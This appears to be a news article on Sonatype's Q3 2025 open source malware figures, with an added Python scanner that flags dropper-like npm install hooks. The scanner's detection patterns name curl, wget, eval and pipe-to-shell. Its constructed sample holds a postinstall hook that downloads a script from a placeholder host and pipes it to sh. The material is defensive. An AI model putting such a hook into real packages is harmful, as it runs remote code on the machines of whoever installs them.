Open source malware, a term that has gained traction in recent years, refers to malicious code concealed within packages and models shared on public registries such as npm, PyPI, and Hugging Face. These registries, which host the free tools developers depend on, have become prime targets for cybercriminals seeking to slip harmful code into trusted systems.
According to Sonatype’s recently released Open Source Malware Index, 34,319 malicious open source packages were identified in the third quarter of 2025 alone; over the past six years the company has uncovered 877,522 in total. Sonatype also reports that attackers’ tactics have grown more sophisticated, with artificial intelligence now used to embed malware more convincingly in the very tools developers rely on.
This new breed of malware is designed to masquerade as ordinary code while stealthily stealing data or maintaining long-term access to systems. Rather than launching overt attacks that generate noise and alert security teams, these criminals have shifted their focus to stealthy operations. By leveraging AI, they craft malware that blends in with legitimate code, complicating detection efforts until significant damage has occurred.
Why Are the Numbers So High?
The rise in malicious packages is rooted in how open source registries work rather than in any single flaw. They run on community trust and open collaboration: anyone can create an account and publish a package, and neither npm nor PyPI reviews a package before it goes live. Once a malicious package is published, it can spread quickly, because projects pull dependencies automatically, often transitively through other packages they depend on, and install scripts or module code then run on every machine that installs them.
In the third quarter, data exfiltration malware constituted 37% of all detected malicious open source packages, as reported by Sonatype. This type of malware is particularly insidious, focusing on stealing credentials, access tokens, and other sensitive information. Given that developers frequently incorporate open source libraries into corporate software, attackers effectively gain a backdoor into organizational systems.
Additionally, the growth of multi-stage attacks has contributed to the alarming statistics. Nearly 38% of all threats identified in Q3 were categorized as “droppers,” small packages whose only job is to covertly install additional payloads such as backdoors or information stealers. The prevalence of backdoor-laden packages surged by 143% compared to the previous quarter. These layered attacks complicate detection: the package that is published and scanned looks innocuous, and only at install or run time does it retrieve the real malware in the background.
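The dropper pattern described above is easiest to spot at the install hook, since an npm package that wants to pull a second stage usually does it from a `preinstall`, `install` or `postinstall` script. The scanner below is an added example, not code from Sonatype or from the article, and it uses constructed package.json documents and a placeholder host (`payload.example.invalid`) rather than any real package. It reports every install hook a package declares and marks the package suspicious when a hook command contains indicators of downloading, decoding or evaluating code at install time.

```python
"""Added example: flag npm packages whose install hooks behave like droppers.

A dropper keeps its visible code benign and uses an install-time hook to
fetch, decode or evaluate a second stage. This scanner parses package.json,
reports every install hook it finds, and returns "suspicious" when a hook
carries indicators of that behaviour. Samples below are constructed.
"""
import json
import re

# Lifecycle scripts npm runs automatically when a package is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Indicators of second-stage retrieval or obfuscation inside a hook command.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.IGNORECASE),
    "inline_eval": re.compile(r"\bnode\s+-e\b|\beval\(|new Function\(", re.IGNORECASE),
    "encoded_payload": re.compile(r"base64|\\x[0-9a-fA-F]{2}|fromCharCode", re.IGNORECASE),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|zsh|node)\b", re.IGNORECASE),
}


def scan_package_json(text):
    """Return one finding per install hook: the hook, its command, matched indicators."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        matched = [name for name, rx in INDICATORS.items() if rx.search(command)]
        findings.append({"hook": hook, "command": command, "indicators": matched})
    return findings


def verdict(findings):
    """'suspicious' if any hook has indicators, 'review' if hooks exist, else 'clean'."""
    if any(f["indicators"] for f in findings):
        return "suspicious"
    return "review" if findings else "clean"


# Constructed samples (hypothetical packages, not real ones).
BENIGN = json.dumps({
    "name": "example-utils", "version": "1.0.0",
    "scripts": {"test": "node test.js", "build": "tsc -p ."},
})
HOOK_ONLY = json.dumps({  # a native module with a legitimate build step
    "name": "example-native", "version": "2.3.0",
    "scripts": {"install": "node-gyp rebuild"},
})
DROPPER = json.dumps({  # same name as BENIGN, one patch version later
    "name": "example-utils", "version": "1.0.1",
    "scripts": {
        "test": "node test.js",
        "postinstall": "node -e \"require('child_process').exec("
                       "'curl -s https://payload.example.invalid/s | sh')\"",
    },
})

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("hook_only", HOOK_ONLY), ("dropper", DROPPER)):
        findings = scan_package_json(doc)
        print(f"{label}: {verdict(findings)} {findings}")
```

Point it at `node_modules/*/package.json` after a fresh install, or at the `package/package.json` inside a downloaded tarball before installing. A hook with no indicators still returns “review” rather than “clean”, because a dropper can just as easily run a bundled file (`node setup.js`) whose contents need to be read by hand; the indicator list only catches the lazy variants. Setting `ignore-scripts=true` in `.npmrc` stops all such hooks from running, at the cost of breaking packages that genuinely need a build step like the `node-gyp` sample above.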
Interestingly, the once-popular crypto mining tools have seen a decline, now accounting for only 4% of total malware this quarter, down from 6%. This shift indicates that criminals are moving away from easily detectable code and are instead investing in long-term strategies that yield a consistent stream of stolen data or financial access.
Who Is Being Targeted?
Data indicates that financial organizations are bearing the brunt of these attacks. Sonatype’s research reveals that 47% of blocked open source malware attempts in Q3 were aimed at banks and other financial services. The primary objective for these attackers is to acquire money, credentials, and confidential information that can be exploited or sold for further malicious activities.
Moreover, by directly targeting developers and infecting the tools they utilize, criminals can reach a broader audience of potential victims. The npm hijacking incident involving the widely used “chalk” and “debug” packages, which collectively boasted over two billion weekly downloads, exemplifies the potential damage that can arise when trusted software turns hostile.
Another notable campaign, dubbed Shai-Hulud, demonstrated a self-replicating capability, automatically spreading across repositories, pilfering credentials, and publishing new compromised packages without human intervention. This level of sophistication marks a significant advancement in malware design, where a single infection can proliferate across thousands of projects in a remarkably short timeframe.
What Happened Earlier This Year?
Reflecting on earlier developments, Sonatype reported in April that 17,954 malicious packages were identified in the first quarter of 2025, a record at that time. Over half of these targeted confidential data, a notable increase from 26% in late 2024. Financial institutions and government offices were frequent targets, as criminals sought tokens, system logs, and login credentials capable of breaching entire networks.
Since then, the situation has deteriorated, with the latest report indicating a rise in refined malware designed to steal information rather than merely disrupt operations. What initially began as an uptick in cryptominers and data stealers has evolved into highly organized attacks targeting trusted dependencies, underscoring the urgent need for enhanced vigilance in the open source community.